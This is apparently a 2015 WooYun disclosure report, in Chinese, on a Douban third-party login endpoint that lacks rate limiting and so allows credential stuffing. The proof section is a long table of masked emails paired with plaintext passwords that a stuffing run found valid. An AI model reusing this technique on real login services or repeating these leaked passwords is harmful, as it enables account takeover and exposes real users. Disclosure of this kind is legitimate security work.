当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136042

漏洞标题:豆瓣第三方登录接口问题,导致撞库泄露用户帐号

相关厂商:豆瓣

漏洞作者: sqlfeng

提交时间:2015-08-23 21:02

修复时间:2015-10-08 10:58

公开时间:2015-10-08 10:58

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

第三方登录接口

详细说明:

https://www.douban.com/service/auth2/auth?client_id=08710dbc5a7ae51c195329350f70af54&redirect_uri=http%3A%2F%2Fwww.zenlifestore.com%2Flogin%2Fgetloginfordouban&response_type=code
这类的登录接口
没有限制登录次数

漏洞证明:

1.png


Payload1	Payload2	Status
[email protected] 101595 302
[email protected] 110112 302
[email protected] 111111 302
[email protected] 111111 302
[email protected] 11111111 302
[email protected] 1123581321 302
[email protected] 116116 302
[email protected] 120781269 302
[email protected] 121763469 302
[email protected] 123123 302
[email protected] 1233212 302
[email protected] 123456 302
[email protected] 12345zxcvb 302
[email protected] 123bing 302
[email protected] 125463 302
[email protected] 13127732113 302
[email protected] 13803262661 302
[email protected] 15021160628 302
[email protected] 159357 302
[email protected] 16569673 302
[email protected] 168vcd 302
[email protected] 16934150 302
[email protected] 1835Lay 302
[email protected] 19820926 302
[email protected] 19840616 302
[email protected] 19851120 302
[email protected] 19860126zz 302
[email protected] 19861025 302
[email protected] 19871008 302
[email protected] 19871013 302
[email protected] 19871206 302
[email protected] 1987523 302
[email protected] 19881011 302
[email protected] 19890404b 302
[email protected] 198917 302
[email protected] 19920521 302
[email protected] 2236831 302
[email protected] 23865942 302
[email protected] 243034478 302
[email protected] 246464 302
[email protected] 26606090 302
[email protected] 303971 302
[email protected] 306100608 302
[email protected] 3303153 302
[email protected] 3303855 302
[email protected] 3314161 302
[email protected] 3320110 302
[email protected] 3322342 302
[email protected] 354978028 302
[email protected] 40328642 302
[email protected] 403403 302
[email protected] 410202552 302
[email protected] 423156 302
[email protected] 471775 302
[email protected] 4754643 302
[email protected] 49192009 302
[email protected] 5106231990 302
[email protected] 519999999 302
[email protected] 520120 302
[email protected] 52012513 302
[email protected] 527505643 302
[email protected] 52mingming 302
[email protected] 540750 302
[email protected] 5529559 302
[email protected] 5645769 302
[email protected] 5772060 302
[email protected] 58421q 302
[email protected] 585858 302
[email protected] 597536395 302
[email protected] 59aiang 302
[email protected] 6158153 302
[email protected] 6225065 302
[email protected] 630417 302
[email protected] 64462888 302
[email protected] 66256991 302
[email protected] 696969 302
[email protected] 730913 302
[email protected] 743691 302
[email protected] 7758258 302
[email protected] 7758521 302
[email protected] 79356587 302
[email protected] 8100988 302
[email protected] 818168 302
[email protected] 8297193 302
[email protected] 8310207 302
[email protected] 840626 302
[email protected] 84109169 302
[email protected] 85127559 302
[email protected] 8565841 302
[email protected] 8601327 302
[email protected] 860613 302
[email protected] 86891992 302
[email protected] 870108 302
[email protected] 881119 302
[email protected] 881130 302
[email protected] 88297613 302
[email protected] 888567 302
[email protected] 970709 302
[email protected] a19880725 302
[email protected] admin123456 302
[email protected] andy2008 302
[email protected] at201314 302
[email protected] bxfllmzhu 302
[email protected] chen0806 302
[email protected] chenjietan 302
[email protected] cl123456 302
[email protected] ewaychen 302
[email protected] hao142753 302
[email protected] haoren 302
[email protected] iloveme 302
[email protected] jj3592371 302
[email protected] kknima 302
[email protected] l19900829 302
[email protected] lipengan 302
[email protected] luna19750502 302
[email protected] lw5211314 302
[email protected] mengbd520 302
[email protected] myself 302
[email protected] nokia880823 302
[email protected] qaz5989126 302
[email protected] shui2030jin 302
[email protected] tlj5201314 302
[email protected] wangbin 302
[email protected] wanghuijie520 302
[email protected] wj860320 302
[email protected] woaishuai 302
[email protected] wz1988 302
[email protected] x59734565 302
[email protected] yamaha123 302
[email protected] z86813092 302
[email protected] zr1989221 302

修复方案:

不知道了。。。

版权声明:转载请注明来源 sqlfeng@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-24 10:57

厂商回复:

确实是个设计缺陷 立即组织修复

最新状态:

暂无